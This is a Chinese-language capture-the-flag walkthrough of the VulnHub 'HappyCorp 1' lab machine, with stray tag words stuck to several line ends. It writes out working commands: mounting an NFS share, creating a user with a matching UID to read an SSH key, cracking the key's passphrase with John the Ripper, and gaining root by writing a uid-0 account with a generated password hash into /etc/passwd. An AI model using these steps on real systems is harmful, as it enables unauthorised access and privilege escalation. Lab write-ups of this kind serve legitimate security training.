靶机连接:php
https://www.vulnhub.com/entry/happycorp-1,296/python
网络主机扫描:::git
主机端口扫描:github
NFS文件系统,尝试挂载试试web
mount -t nfs 10.10.202.135:/home/karl /mntshell
提示没权限打开。这里暂时放一放,看看HTTP方面,有个admin.php后台能不能上传,拿shellbash
web页面收集用户信息:网络
heather 提示密码错误
carolyn 帐户不存在
rodney 帐户不存在
jennifer 帐户不存在app
存在帐户枚举,这里进行爆破top 500 weak password 没成功,放弃ssh
尝试post username SQL注入,失败
继续看看NFS如何能读取到.SSH文件夹下的内容
尝试看下UID,咱们可否建立UID相同的用户去读取文件呢
╰─ groupadd --gid 1001 test
╰─ useradd --uid 1001 --group test pentest
获取到了秘钥,复制下来,保存成文件,尝试使用用户karl用户登陆,结果。。。。
这秘钥密码是啥,先爆破试试,工具 ssh2john.py
https://github.com/koboi137/john
python ssh2john.py /root/key.txt > /root/sshkey_login
╰─ john --wordlist=/usr/share/wordlists/rockyou.txt sshkey_login
成功登陆
接下来就是进行提权操做,不是标准的shell,这里从新链接,指定shell
╰─ ssh -i key.txt karl@10.10.202.135 -t "/bin/sh"
find / -perm -u=s -type f 2>/dev/null
这里的思路就是复制passwd文件,复制到NFS文件共享目录,而后增长明文密码权限,而后复制回去替换,切换用户,获取root权限
openssl passwd -1 -salt hack404 pass123
$1$hack404$auqhHGf8QPcNJkxkSEm1O0
hack404:$1$hack404$auqhHGf8QPcNJkxkSEm1O0:0:0:root:/root:/bin/bash
登陆成功去看下amdin.php文件的密码究竟是什么玩意
登陆试试
感受有包含漏洞
OVER !!!